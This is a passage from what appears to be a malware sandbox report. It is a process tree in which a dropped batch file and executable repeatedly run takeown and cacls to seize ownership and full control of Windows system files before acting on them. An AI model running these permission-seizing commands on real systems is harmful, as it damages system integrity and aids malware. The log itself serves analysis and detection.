                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                3⤵
                                                                  PID:7468
                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                    lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:7080
                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:8524
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
                                                                2⤵
                                                                  PID:8568
                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:7604
                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
                                                                    3⤵
                                                                    • Modifies file permissions
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:7620
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                    3⤵
                                                                      PID:7628
                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                        lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:7652
                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:7712
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
                                                                    2⤵
                                                                      PID:7684
                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                        cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                        3⤵
                                                                          PID:3428
                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                          takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
                                                                          3⤵
                                                                          • Modifies file permissions
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:7764
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                          3⤵
                                                                            PID:6036
                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                              lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:7744
                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:1460
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
                                                                          2⤵
                                                                            PID:6044
                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                              cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                              3⤵
                                                                                PID:4108
                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
                                                                                3⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3348
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                3⤵
                                                                                  PID:5924
                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                    lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5988
                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:7840
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
                                                                                2⤵
                                                                                  PID:7900
                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                                    3⤵
                                                                                      PID:7936
                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                      takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
                                                                                      3⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:8640
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                      3⤵
                                                                                        PID:6080
                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                          lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2124
                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3780
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui""
                                                                                      2⤵
                                                                                        PID:6740
                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                          cacls "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                                          3⤵
                                                                                            PID:8032
                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                            takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui"
                                                                                            3⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:7208
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                            3⤵
                                                                                              PID:8168
                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4720
                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2228
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
                                                                                            2⤵
                                                                                              PID:8132
                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
                                                                                                3⤵
                                                                                                  PID:2572
                                                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                                                  takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
                                                                                                  3⤵
                                                                                                  • Modifies file permissions
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5536
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "Workflow.Targets" -nobanner
                                                                                                  3⤵
                                                                                                    PID:8184
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                      lrEU2Z2i.exe -accepteula "Workflow.Targets" -nobanner
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5520
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5516
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
                                                                                                  2⤵
                                                                                                    PID:2276
                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                      cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                                                      3⤵
                                                                                                        PID:8392
                                                                                                      • C:\Windows\SysWOW64\takeown.exe
                                                                                                        takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
                                                                                                        3⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:8388
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                        3⤵
                                                                                                          PID:5452
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                            lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5288
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:3516
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
                                                                                                        2⤵
                                                                                                          PID:5220
                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                            cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
                                                                                                            3⤵
                                                                                                              PID:4684
                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                              takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:5168
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "ImagingDevices.exe" -nobanner
                                                                                                              3⤵
                                                                                                                PID:4112
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                  lrEU2Z2i.exe -accepteula "ImagingDevices.exe" -nobanner
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:692
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1492
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
                                                                                                              2⤵
                                                                                                                PID:3224
                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                  cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
                                                                                                                  3⤵
                                                                                                                    PID:6116
                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
                                                                                                                    3⤵
                                                                                                                    • Modifies file permissions
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:6100
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "BrowserCore.exe" -nobanner
                                                                                                                    3⤵
                                                                                                                      PID:8916
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                        lrEU2Z2i.exe -accepteula "BrowserCore.exe" -nobanner
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:1472
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:7524
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
                                                                                                                    2⤵
                                                                                                                      PID:5844
                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                        cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                        3⤵
                                                                                                                          PID:8860
                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                          takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
                                                                                                                          3⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:5728
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                          3⤵
                                                                                                                            PID:4832
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                              lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5784
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:8332
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
                                                                                                                          2⤵
                                                                                                                            PID:6964
                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                              cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                              3⤵
                                                                                                                                PID:5472
                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
                                                                                                                                3⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:5968
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                3⤵
                                                                                                                                  PID:7376
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                    lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6136
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5672
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
                                                                                                                                2⤵
                                                                                                                                  PID:8460
                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
                                                                                                                                    3⤵
                                                                                                                                      PID:3056
                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                      takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
                                                                                                                                      3⤵
                                                                                                                                      • Modifies file permissions
                                                                                                                                      PID:5628
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "Workflow.Targets" -nobanner
                                                                                                                                      3⤵
                                                                                                                                        PID:5668
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                          lrEU2Z2i.exe -accepteula "Workflow.Targets" -nobanner
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5868
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5128
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
                                                                                                                                      2⤵
                                                                                                                                        PID:8868
                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                          cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
                                                                                                                                          3⤵
                                                                                                                                            PID:9048
                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                            takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
                                                                                                                                            3⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:9084
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:9136
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                              lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:1524
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:8464
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
                                                                                                                                          2⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:7544
                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                            cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
                                                                                                                                            3⤵
                                                                                                                                              PID:8512
                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                              takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
                                                                                                                                              3⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:8500
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                              3⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:7124
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:9180
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:8876
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:8320
                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                              cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
                                                                                                                                              3⤵
                                                                                                                                                PID:8476
                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
                                                                                                                                                3⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:8452
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                                3⤵
                                                                                                                                                  PID:8836
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                    lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:8504
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:8592
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:7044
                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                  cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1336
                                                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    PID:8760
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                    3⤵
                                                                                                                                                      PID:8664
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                        lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:8788
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:8796
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui""
                                                                                                                                                    2⤵
                                                                                                                                                      PID:8812
                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                        cacls "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                                                        3⤵
                                                                                                                                                          PID:8856
                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                          takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\PhotoAcq.dll.mui"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6336
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                            3⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:8748
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                              lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:9192
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:9152
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.cf220411-444b-4a7f-8fbf-d5ff88e98637.1.etl""
                                                                                                                                                          2⤵
                                                                                                                                                            PID:8964
                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                              cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.cf220411-444b-4a7f-8fbf-d5ff88e98637.1.etl" /E /G Admin:F /C
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5332
                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.cf220411-444b-4a7f-8fbf-d5ff88e98637.1.etl"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:9008
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "UpdateSessionOrchestration.cf220411-444b-4a7f-8fbf-d5ff88e98637.1.etl" -nobanner
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:9028
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                      lrEU2Z2i.exe -accepteula "UpdateSessionOrchestration.cf220411-444b-4a7f-8fbf-d5ff88e98637.1.etl" -nobanner
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:9076
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
